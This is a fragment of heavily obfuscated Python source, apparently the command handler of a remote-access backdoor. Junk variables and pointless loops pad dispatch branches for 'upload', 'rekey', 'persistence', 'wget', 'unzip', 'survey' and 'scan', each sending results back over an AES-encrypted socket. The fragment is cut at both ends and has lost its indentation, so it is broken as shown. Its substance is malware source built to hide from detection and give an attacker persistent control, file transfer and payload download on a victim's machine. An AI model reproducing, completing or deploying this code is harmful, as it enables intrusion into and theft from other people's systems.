kavWLdTdVCXoLeAJJYykpVocOHVeaewLsjWzOomnuTfPtjDiycDgJBUgfKpvPUKq = 'VsowsSUdmTjlSZTQlIvNJqHCdavaXaRMOeIMolpIMqbwRJkxEewYfjkOSHmMaUSx'
HNwzDHfDvqyJDLgqjRLbSErnNSIemVELwElSPWIPUUwhHodphFCvmOtEeEKjvKzv = 'KQUzyoDEERvhQKCKtsfxCNPGocVTiyTrsxnNqQkTNJeeERGESQDnperRiOTSSAcG'
if UwKQJQMKYXUlwFuznaNcYycfIzowKZkvLzoRjErFvRMUMhFKYDivdZGsAcMwZcPw == kavWLdTdVCXoLeAJJYykpVocOHVeaewLsjWzOomnuTfPtjDiycDgJBUgfKpvPUKq:
HNwzDHfDvqyJDLgqjRLbSErnNSIemVELwElSPWIPUUwhHodphFCvmOtEeEKjvKzv = 'KQUzyoDEERvhQKCKtsfxCNPGocVTiyTrsxnNqQkTNJeeERGESQDnperRiOTSSAcG'
HNwzDHfDvqyJDLgqjRLbSErnNSIemVELwElSPWIPUUwhHodphFCvmOtEeEKjvKzv = UwKQJQMKYXUlwFuznaNcYycfIzowKZkvLzoRjErFvRMUMhFKYDivdZGsAcMwZcPw
else:
HNwzDHfDvqyJDLgqjRLbSErnNSIemVELwElSPWIPUUwhHodphFCvmOtEeEKjvKzv = 'KQUzyoDEERvhQKCKtsfxCNPGocVTiyTrsxnNqQkTNJeeERGESQDnperRiOTSSAcG'
HNwzDHfDvqyJDLgqjRLbSErnNSIemVELwElSPWIPUUwhHodphFCvmOtEeEKjvKzv = 'sjIjWMrbZgddxLWDwPqVzHyJrgyvPefjIaGfyHHSSspagsvXmnMCHLtPWtXiXmQs'
for OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ in gjydbwjOJAzCLnUbmdOxDXJdNCxvhMPgRpoErUpfUlgooWLdjzXISOyoGcWhAtwX.split():
kxvYGjHIkDKgdAGPrnrgnWRhyuwkiAkzaBpjOXLKzefOSXUNsaxnnULZTZuoGqlK = 'HWiJeijlkSBzUAKLaxfclSkFDaJRFZyczjMrgiJvuIcrNcPncqETIyPjjPmdinyP'
JuzAJQrYSVKrFoQbyeivJqMmhfqWdGOkHOeWqNahyPgEeLfrVVzguWuKHTbovBrH = 'NuvafeqyHVvEhIRcEblMqphNocXIuTSWnTMroCzWOLKsUPcIyoWxYxnGfPMzjROb'
AzrPdnOyjufWrqgTgYmbFlqtGJuSjYmZcatYyOMpCdgYrtqcCsIiiBJslHmFVcnY = 'yIhfqYNXYRQRWTZpnGoMcnbhRQMIdpgGPECmuNeficFRHNPhqzWBeiFXCEEKCtfI'
YYqVojsBfwpKMLHBOPpaHJpDSKDLwkmMFZLhpRYyAWjpVbMEjMgBqTgRIVNBPDfb = 'yntdfZORhKxvAPcPaZaInOQxzgjxOoMUkUcDiKYAveGOklIIslsaEpPIKVQJvyVv'
ciuuzQwkwNPjfUwaWOlmDmXGQIsaVUoOaNHlaEeHYORpQFYmSOJUQxgGbzkMMeoW = 'GseqGILGvoQFcnORZMhQDAAbTaiovLCIHdXubRpQMBhcSIoTCyhLYZuFwRafypqf'
DnTAfJapDESanqKSxnuEeuesYBpUGXwJiruMcwZVSrcJtkYfNjJpFhXdbYfyTQkn = 'sCkIzQlCuLkbQWEQmiTFUiACJehVkheDnZFMNiZNgmPbVMaRYnHvbYKaTxTgsBRB'
AUYaIVsPCZsLDGyGsRJniNDXpXwbEbPEwemStWbPvAtREHqdXYtmaLuYDdWiDNeg = [
'HWiJeijlkSBzUAKLaxfclSkFDaJRFZyczjMrgiJvuIcrNcPncqETIyPjjPmdinyP',
'yIhfqYNXYRQRWTZpnGoMcnbhRQMIdpgGPECmuNeficFRHNPhqzWBeiFXCEEKCtfI',
'GseqGILGvoQFcnORZMhQDAAbTaiovLCIHdXubRpQMBhcSIoTCyhLYZuFwRafypqf',
'ExKVcPNaRwRkrpMLMBvtCbcAuhEzNcEXTBeGyrdRvqhNRyNEzlrmWGeGdiAUXLoR'
]
for kxvYGjHIkDKgdAGPrnrgnWRhyuwkiAkzaBpjOXLKzefOSXUNsaxnnULZTZuoGqlK in DnTAfJapDESanqKSxnuEeuesYBpUGXwJiruMcwZVSrcJtkYfNjJpFhXdbYfyTQkn:
for JuzAJQrYSVKrFoQbyeivJqMmhfqWdGOkHOeWqNahyPgEeLfrVVzguWuKHTbovBrH in AzrPdnOyjufWrqgTgYmbFlqtGJuSjYmZcatYyOMpCdgYrtqcCsIiiBJslHmFVcnY:
if YYqVojsBfwpKMLHBOPpaHJpDSKDLwkmMFZLhpRYyAWjpVbMEjMgBqTgRIVNBPDfb == ciuuzQwkwNPjfUwaWOlmDmXGQIsaVUoOaNHlaEeHYORpQFYmSOJUQxgGbzkMMeoW:
JuzAJQrYSVKrFoQbyeivJqMmhfqWdGOkHOeWqNahyPgEeLfrVVzguWuKHTbovBrH = kxvYGjHIkDKgdAGPrnrgnWRhyuwkiAkzaBpjOXLKzefOSXUNsaxnnULZTZuoGqlK
elif ciuuzQwkwNPjfUwaWOlmDmXGQIsaVUoOaNHlaEeHYORpQFYmSOJUQxgGbzkMMeoW == JuzAJQrYSVKrFoQbyeivJqMmhfqWdGOkHOeWqNahyPgEeLfrVVzguWuKHTbovBrH:
JuzAJQrYSVKrFoQbyeivJqMmhfqWdGOkHOeWqNahyPgEeLfrVVzguWuKHTbovBrH = DnTAfJapDESanqKSxnuEeuesYBpUGXwJiruMcwZVSrcJtkYfNjJpFhXdbYfyTQkn
else:
ciuuzQwkwNPjfUwaWOlmDmXGQIsaVUoOaNHlaEeHYORpQFYmSOJUQxgGbzkMMeoW = DnTAfJapDESanqKSxnuEeuesYBpUGXwJiruMcwZVSrcJtkYfNjJpFhXdbYfyTQkn
for JuzAJQrYSVKrFoQbyeivJqMmhfqWdGOkHOeWqNahyPgEeLfrVVzguWuKHTbovBrH in AUYaIVsPCZsLDGyGsRJniNDXpXwbEbPEwemStWbPvAtREHqdXYtmaLuYDdWiDNeg:
AzrPdnOyjufWrqgTgYmbFlqtGJuSjYmZcatYyOMpCdgYrtqcCsIiiBJslHmFVcnY = JuzAJQrYSVKrFoQbyeivJqMmhfqWdGOkHOeWqNahyPgEeLfrVVzguWuKHTbovBrH
OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ = OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ.strip()
sendfile(gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk, OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa)
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'upload':
gdPbJydjXYmFoXgyywVZAOnBxUriGNIXHHWBJdytfvTRbYjHsIXcJfwGZokqHKtM = 'xuKZVZAmuSlqshUbEUftswPRcCShBdGFRdANQRWTlxHZBSOVXbdkuRtXIMlZQnOs'
pidUFBICPAwDFAYUVjoZhxDtwprnnXIaovTQYxaXoenhJdFJnpwzZpiTGAcnxOBI = 'IzoiPUtmuTxwvnhzwKBQbrFoSNdzJNtNMDsKObWLOALmydtcqtJFItlymGjgtLVv'
YPyHXcXYSFhCIsgcCilFeVXaTfIRwObCPSiYerqMaltjMtRSvdTZWwvMqwwbPJfa = 'edXUUjdjOoIoNhCRwcVEAbrSsynHGACDhAZWmxazWmmNYIMsJcnswMPSenNmxIjc'
PjPUCGQMcZlTRPcOWatFRaPpwaVHJQNKqcfRecKxfKfRMijhMOfwOVMmwBlsyxxR = 'KhOUmgGpRdecSNXRglUAkechhRDDFOXrQYgLvBOqahPCpfqFWJaPpiLzeGFIehwD'
sxHrHSdvzOrByPhhLwjobLfaoLWwWwTTCDymsHFfreHzOcevgVPLiZQOOwSNBVGX = 'oYVbCjvgznyiVHjRHOtKLLhaebktYoiVNaIXyDzkBOIKaVzopfuCUEayhtTAScSy'
URrlXxDSJWSoRKNXtYsAqGZHpLYmuRBZgZwKFnfmSkHHXushbUAWXGiirXGEulbc = 'wnCYxRcaQheimXxrnSOVWhPTfqlkdBjreYLHVEZluaaNNLmvEERhuLyGZZadwwSO'
ispxXOYxbesixbuHUFFRkQiMzTDLScTHUllZByRwnboGaMVmOsMhVRXcDYTkecIL = [
'xuKZVZAmuSlqshUbEUftswPRcCShBdGFRdANQRWTlxHZBSOVXbdkuRtXIMlZQnOs',
'edXUUjdjOoIoNhCRwcVEAbrSsynHGACDhAZWmxazWmmNYIMsJcnswMPSenNmxIjc',
'oYVbCjvgznyiVHjRHOtKLLhaebktYoiVNaIXyDzkBOIKaVzopfuCUEayhtTAScSy',
'KAOAufsoBuRrcpFMjhlpmbqpinhazTOXHcwieBUdPOOmBkryATqNsUjQjDzoKiXc'
]
for gdPbJydjXYmFoXgyywVZAOnBxUriGNIXHHWBJdytfvTRbYjHsIXcJfwGZokqHKtM in URrlXxDSJWSoRKNXtYsAqGZHpLYmuRBZgZwKFnfmSkHHXushbUAWXGiirXGEulbc:
for pidUFBICPAwDFAYUVjoZhxDtwprnnXIaovTQYxaXoenhJdFJnpwzZpiTGAcnxOBI in YPyHXcXYSFhCIsgcCilFeVXaTfIRwObCPSiYerqMaltjMtRSvdTZWwvMqwwbPJfa:
if PjPUCGQMcZlTRPcOWatFRaPpwaVHJQNKqcfRecKxfKfRMijhMOfwOVMmwBlsyxxR == sxHrHSdvzOrByPhhLwjobLfaoLWwWwTTCDymsHFfreHzOcevgVPLiZQOOwSNBVGX:
pidUFBICPAwDFAYUVjoZhxDtwprnnXIaovTQYxaXoenhJdFJnpwzZpiTGAcnxOBI = gdPbJydjXYmFoXgyywVZAOnBxUriGNIXHHWBJdytfvTRbYjHsIXcJfwGZokqHKtM
elif sxHrHSdvzOrByPhhLwjobLfaoLWwWwTTCDymsHFfreHzOcevgVPLiZQOOwSNBVGX == pidUFBICPAwDFAYUVjoZhxDtwprnnXIaovTQYxaXoenhJdFJnpwzZpiTGAcnxOBI:
pidUFBICPAwDFAYUVjoZhxDtwprnnXIaovTQYxaXoenhJdFJnpwzZpiTGAcnxOBI = URrlXxDSJWSoRKNXtYsAqGZHpLYmuRBZgZwKFnfmSkHHXushbUAWXGiirXGEulbc
else:
sxHrHSdvzOrByPhhLwjobLfaoLWwWwTTCDymsHFfreHzOcevgVPLiZQOOwSNBVGX = URrlXxDSJWSoRKNXtYsAqGZHpLYmuRBZgZwKFnfmSkHHXushbUAWXGiirXGEulbc
for pidUFBICPAwDFAYUVjoZhxDtwprnnXIaovTQYxaXoenhJdFJnpwzZpiTGAcnxOBI in ispxXOYxbesixbuHUFFRkQiMzTDLScTHUllZByRwnboGaMVmOsMhVRXcDYTkecIL:
YPyHXcXYSFhCIsgcCilFeVXaTfIRwObCPSiYerqMaltjMtRSvdTZWwvMqwwbPJfa = pidUFBICPAwDFAYUVjoZhxDtwprnnXIaovTQYxaXoenhJdFJnpwzZpiTGAcnxOBI
for OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ in gjydbwjOJAzCLnUbmdOxDXJdNCxvhMPgRpoErUpfUlgooWLdjzXISOyoGcWhAtwX.split():
JBiSZgnpSEJeZrSwPVKNtoEjTwkPilwXUvqWltixYzSIRTTTVsMImBgHDgsJXSsx = 'IDnNneEwYyWsYeSSMlupkicAAtZXuwNAwQuTxnCPENofDhnpzBHZqTEXEeiBogoI'
YWJEPkoIBpxMAhgvMiWOYCWxxTMihIVCNLHsWAYyiyVKfjXBXDLOWHREWmhqSdin = 'FHKNuAcpDAoNBeCjgqCddmNDRkZwidQxjxfErefpADpNPDWQDDGIrEmgTONQxkzD'
if JBiSZgnpSEJeZrSwPVKNtoEjTwkPilwXUvqWltixYzSIRTTTVsMImBgHDgsJXSsx != YWJEPkoIBpxMAhgvMiWOYCWxxTMihIVCNLHsWAYyiyVKfjXBXDLOWHREWmhqSdin:
JBiSZgnpSEJeZrSwPVKNtoEjTwkPilwXUvqWltixYzSIRTTTVsMImBgHDgsJXSsx = 'FHKNuAcpDAoNBeCjgqCddmNDRkZwidQxjxfErefpADpNPDWQDDGIrEmgTONQxkzD'
YWJEPkoIBpxMAhgvMiWOYCWxxTMihIVCNLHsWAYyiyVKfjXBXDLOWHREWmhqSdin = JBiSZgnpSEJeZrSwPVKNtoEjTwkPilwXUvqWltixYzSIRTTTVsMImBgHDgsJXSsx
JBiSZgnpSEJeZrSwPVKNtoEjTwkPilwXUvqWltixYzSIRTTTVsMImBgHDgsJXSsx = 'IDnNneEwYyWsYeSSMlupkicAAtZXuwNAwQuTxnCPENofDhnpzBHZqTEXEeiBogoI'
OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ = OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ.strip()
recvfile(gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk, OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa)
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'rekey':
onCpynAuyacwzFjkmlJEXbkDfhwfKOJsuUPzidYiXEKuCXdLbxpjZCRknrdCbLFH = 'xvwcZAnbNDtaaigKSUNkyiWoktSrtkSgwPLYSkCpFMWxEVcphqDadolvplCgQxYq'
xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ = 'DsQfuzwuNAsybLkWjeiZepuYKIwWMCoIuTcdgbdTFyGqTyslAVmgcaZDxXeHwUEP'
egmZuaKlsbNgRessWdDEjXBnkRZqkEIJsQQGogWyUuZipsjgozjziBhbozIBBXfa = 'ayOXmANzwwAEmcHpENdFFauAYDIwgPJnfbmuwIWMgnUODlVWIgBnAQqallSkuOeY'
CNqqiDEyxJeoAFmGnEUwGWNLrvnzgLgmzKoSvOMivRaHiRlnFGzRHxmjgYDSTOTS = 'vbGnMCSkPeeKEMNNxmoCQNdisqdRmTTzQAbrrUTtCrWIbdJuONxTrvWezJEJqdeN'
okTCMMFGHYzoQRRCeEVsCfGlbtSybHQnEvvRZKZzXJoBauCmQGHHAkvBaQJxOlKA = 'lZnhTFpqoXcRSzIqUxfZAUqEqLYOTyCGDDDaEbcbtThbZGhtGINmUhQuHJzHAnfA'
if onCpynAuyacwzFjkmlJEXbkDfhwfKOJsuUPzidYiXEKuCXdLbxpjZCRknrdCbLFH in xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ:
onCpynAuyacwzFjkmlJEXbkDfhwfKOJsuUPzidYiXEKuCXdLbxpjZCRknrdCbLFH = okTCMMFGHYzoQRRCeEVsCfGlbtSybHQnEvvRZKZzXJoBauCmQGHHAkvBaQJxOlKA
if xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ in egmZuaKlsbNgRessWdDEjXBnkRZqkEIJsQQGogWyUuZipsjgozjziBhbozIBBXfa:
xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ = CNqqiDEyxJeoAFmGnEUwGWNLrvnzgLgmzKoSvOMivRaHiRlnFGzRHxmjgYDSTOTS
elif xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ in onCpynAuyacwzFjkmlJEXbkDfhwfKOJsuUPzidYiXEKuCXdLbxpjZCRknrdCbLFH:
egmZuaKlsbNgRessWdDEjXBnkRZqkEIJsQQGogWyUuZipsjgozjziBhbozIBBXfa = xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ
if egmZuaKlsbNgRessWdDEjXBnkRZqkEIJsQQGogWyUuZipsjgozjziBhbozIBBXfa in xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ:
xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ = okTCMMFGHYzoQRRCeEVsCfGlbtSybHQnEvvRZKZzXJoBauCmQGHHAkvBaQJxOlKA
wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa = diffiehellman(gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk)
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'persistence':
DZYgFeNTEldMkiUOEJZlezSErunxZTweCnGOhoqYkbcsQxqDFFoBeoFVYiwApblY = 'nmAiABcbjhJYZmbwczFwfMZxpVvGrQQYlskHdrQMXnNnGKwZuwRazbNoAoWucvKe'
qaFBHEMjKkcsvsMwRxvrsVHijlBdWaWLrqczWAHENlVnyAlEcGzWDMOEvnTbUWAy = 'pWgzlmpYwFUFrCTQjAVHryoUBKeUeOQHXPenCIxooFzSClNEHMlJQYKnjbOwBtoH nmAiABcbjhJYZmbwczFwfMZxpVvGrQQYlskHdrQMXnNnGKwZuwRazbNoAoWucvKe'
PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak = run(ifkyjfqMKsCDTTKFljvJpynmzoQOwTIGPtROJfuaHPXOZyRatKVogjTWNRvciIlg)
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.send(AES_encrypt(PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa))
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'wget':
kpKMRjNpRgIbYEwbIYtghxWLHelAttaoelHZZwdTvXaYJexnKvuBRumwtUkrfkcS = 'wRdTrETVNbJswOwDLqEZuInrxmPOFQHijXpzvcwrFVcnPztarZUaoDZTasuUokGq'
bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd = 'UfeAnDTLxugVqukmSVIcHQZELGHNdvewXokQWxBhEJuNJhTAYmWdfsOYchmNYgTv'
hMargkvLtyzIZoANcjvhIxNcjAIxeVDMZwtdQwDpPJJZYHYclMUlcVTMIkIbcNkg = 'YBvKWfmUWfDjJQNilHywwuNgkqzrQKpDcrvrdirHegQKvKSzFqEdQcIPPVySGYVz'
gUiYBJALWmmOuonglVWanTdxRYRjJBSIcDlzJXVXExKaicMUqmjETSyMFtvseQju = 'IvCmdYsSXvmmaBkfxQQUquzGkupkIjlTOkQKhSDypxwFPGSsafxgMIZooTGVUaGK'
RuqumvwrCadVDbWmBgZlZjlOsOgAHIKrNVbsDSrqRjnvitKNOHrydDfyHwEaGAts = 'FKQxbghsBlcyCiotuHNOrEYJoxoBDBuTBPGlWQrpUowDqAKxAtSoVdiCAqdxDUJl'
if kpKMRjNpRgIbYEwbIYtghxWLHelAttaoelHZZwdTvXaYJexnKvuBRumwtUkrfkcS in bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd:
kpKMRjNpRgIbYEwbIYtghxWLHelAttaoelHZZwdTvXaYJexnKvuBRumwtUkrfkcS = RuqumvwrCadVDbWmBgZlZjlOsOgAHIKrNVbsDSrqRjnvitKNOHrydDfyHwEaGAts
if bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd in hMargkvLtyzIZoANcjvhIxNcjAIxeVDMZwtdQwDpPJJZYHYclMUlcVTMIkIbcNkg:
bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd = gUiYBJALWmmOuonglVWanTdxRYRjJBSIcDlzJXVXExKaicMUqmjETSyMFtvseQju
elif bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd in kpKMRjNpRgIbYEwbIYtghxWLHelAttaoelHZZwdTvXaYJexnKvuBRumwtUkrfkcS:
hMargkvLtyzIZoANcjvhIxNcjAIxeVDMZwtdQwDpPJJZYHYclMUlcVTMIkIbcNkg = bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd
if hMargkvLtyzIZoANcjvhIxNcjAIxeVDMZwtdQwDpPJJZYHYclMUlcVTMIkIbcNkg in bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd:
bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd = RuqumvwrCadVDbWmBgZlZjlOsOgAHIKrNVbsDSrqRjnvitKNOHrydDfyHwEaGAts
PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak = wget(gjydbwjOJAzCLnUbmdOxDXJdNCxvhMPgRpoErUpfUlgooWLdjzXISOyoGcWhAtwX)
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.send(AES_encrypt(PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa))
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'unzip':
bLskLsJPaRMMpJTciYnHxWHQbdbgQXEjyIGYgvKFshNPhexPCPUOEzUvNttcNjUt = 'WxHkjsZZwTacuKTLqJuXCMPcgJcVAqsVXYZkswYBQNuLjFWLQIeaAVlZSjhyJCGd'
yHOCvqQThTlKbTzJQNqnPsROSwBKnNoKoiAbpabNNTDaeOhHdbZxiEyVQbStulGj = 'XHgXIIyRCXufbuaTuqSkhDLKzuHOpOkvXmdtnFSnbEeCkjOnRodfiOjYHuzyrSsd WxHkjsZZwTacuKTLqJuXCMPcgJcVAqsVXYZkswYBQNuLjFWLQIeaAVlZSjhyJCGd'
PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak = unzip(gjydbwjOJAzCLnUbmdOxDXJdNCxvhMPgRpoErUpfUlgooWLdjzXISOyoGcWhAtwX)
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.send(AES_encrypt(PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa))
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'survey':
QzfmnQPSYoNFhjJJNpaHxaaciZoTDGWNMPmwUYrkqSswivJqUaWJApISvrUAjMts = 'zzOuJoshgQGsynuooilgxtzMWaMxsIiAWEgJUObCcivWUHoBbWjJyfKSGfehHSBI'
RtpsMPgDVfHICIVKaICdwnMSDjOTXAjOvUqLNACKhTgGlYzNqYLQXKjfxGyXDjBf = 'DhHHTZGDRHyhVAGSrDxuNcUmzbrJJekHRCPBTTuLRSZhYurYmZizgVuNLzfGEHZe'
UcKGQaDlYpnlHyeVeDVSZybucImfxozQTyeWwOIIVuNsaidpXbmlVRXDWxwwUwPo = 'SAJxLkDMIJsormhSYNaFENMfaDETWukviUsedvrRfMYkMFTpgwPhZyetwTozLTLW'
HcJMNxbAOkhvxNguhmiXNjSGzxCAkoMIZdAQgPbUzoNSktTXqqZoCmkFkUnhsdVj = 'UDzisOOrtjKpxPeaKaINBMtknjmMrFaFxDwygYwiueYwluzDZTNVrLKlQGARWeyk'
yymXVJfzcIfyEHJQRsXBXNdMwvCwhspwXQDxgewgcPrOZnvcjroAHTBUbFBIVksX = 'PoUUPKztKVVLkNuDOocWXzFWfDMrQLMDijEXBxyzLfCtSlcwqNmQkJGrKXubVNyd'
JOKtqyMcbxKtcAobyWCoGgtnMUlBVoUPyiJDtXivakEwFWlyGjkOokCoEhxJLDOO = 'VDqXjrZkuBEvNcxBAQQXVzAHyQCIdFsNelyiMCGrEMsDyXFRvigGzKoqpFVTJLzT'
if UcKGQaDlYpnlHyeVeDVSZybucImfxozQTyeWwOIIVuNsaidpXbmlVRXDWxwwUwPo == HcJMNxbAOkhvxNguhmiXNjSGzxCAkoMIZdAQgPbUzoNSktTXqqZoCmkFkUnhsdVj:
for JOKtqyMcbxKtcAobyWCoGgtnMUlBVoUPyiJDtXivakEwFWlyGjkOokCoEhxJLDOO in yymXVJfzcIfyEHJQRsXBXNdMwvCwhspwXQDxgewgcPrOZnvcjroAHTBUbFBIVksX:
if JOKtqyMcbxKtcAobyWCoGgtnMUlBVoUPyiJDtXivakEwFWlyGjkOokCoEhxJLDOO == HcJMNxbAOkhvxNguhmiXNjSGzxCAkoMIZdAQgPbUzoNSktTXqqZoCmkFkUnhsdVj:
yymXVJfzcIfyEHJQRsXBXNdMwvCwhspwXQDxgewgcPrOZnvcjroAHTBUbFBIVksX = QzfmnQPSYoNFhjJJNpaHxaaciZoTDGWNMPmwUYrkqSswivJqUaWJApISvrUAjMts
else:
HcJMNxbAOkhvxNguhmiXNjSGzxCAkoMIZdAQgPbUzoNSktTXqqZoCmkFkUnhsdVj = RtpsMPgDVfHICIVKaICdwnMSDjOTXAjOvUqLNACKhTgGlYzNqYLQXKjfxGyXDjBf
PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak = run(ifkyjfqMKsCDTTKFljvJpynmzoQOwTIGPtROJfuaHPXOZyRatKVogjTWNRvciIlg)
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.send(AES_encrypt(PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa))
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'scan':
qrqqddyTUbAjnJQRtVlznntxrnfRPNfEMFtLhPjvGCriLaArIRvwOeJDoXOoBFMO = 'MjtUOwIbqULacngkNigVrJYLHMeSBZBYvCnybrGBNuwiFdAFECpGftsKqCwOPeBq'
VKQXZFTKIiabAWqGrjTkbwTUquYvYynorxNrGTKsUwYqtmHKuJvsZslLrrYgYSJf = 'XtflKNebDqTUpamhAEnZpgCRIzlQdACaQivCrszbVrKeHeDhqNAoqGmXEdyOkRze'
fnBssnvoIUKLCqrvXnWtXyfwpWsSpQCmMBcjNZxgJVEkSJYtPUaTFlHMtcsUdHVl = 'ixbPCrAfEoXOqcdpyhOIngiLyBeXTQIPsPUMSzLQzGcuOvysBCsIOTzmzxjorjtb'
tRsYRWWaNnZaIPzoNqTfiDoUwfvGpOTKwFhDGDpExXRZDZhKNDLtxoWgLliRpkPg = 'eYvxGvGCDUvikmWCQjvfNUnhaFlPlYTDThejoEjfVIBsIjKDokjBzCzvlIRzGqeH'
sLydzvVwtKjQXnnxDWNYaYYyOhGcfHBOSbusdTOYhRzqikyHmpQWbcCDhKTWzSNQ = 'pggLnzKXlsfkMAdSEzlCAphuMohbWqypTgRPCMqscsaocbLBXcrQlZrSjifArZSi'
wSmgHqNbxlhjmYkfuXOpKSVALUlXqUKcKjFoiffSXMzkvndyGIRRGTTDwOYMXxOY = 'EQoosVlbzczWVUhohlksTNSMvamPbgHDMPsPhgGreTKrMnfXjstVcEFMaZtPmHlv'
qhPqsFlqdsGeXFXuPdZjgVVGlSJCMtwnmyBrOCABWKHHcrTPYESURVJiWnliyzPr = [
'MjtUOwIbqULacngkNigVrJYLHMeSBZBYvCnybrGBNuwiFdAFECpGftsKqCwOPeBq',
'ixbPCrAfEoXOqcdpyhOIngiLyBeXTQIPsPUMSzLQzGcuOvysBCsIOTzmzxjorjtb',
'pggLnzKXlsfkMAdSEzlCAphuMohbWqypTgRPCMqscsaocbLBXcrQlZrSjifArZSi',
'QeUnPqGndTsDBnTbnMYpxRpaRbAzCqQxJOdgToxinOpBVWFZJcbkbZjuQwCAVLAH'
]
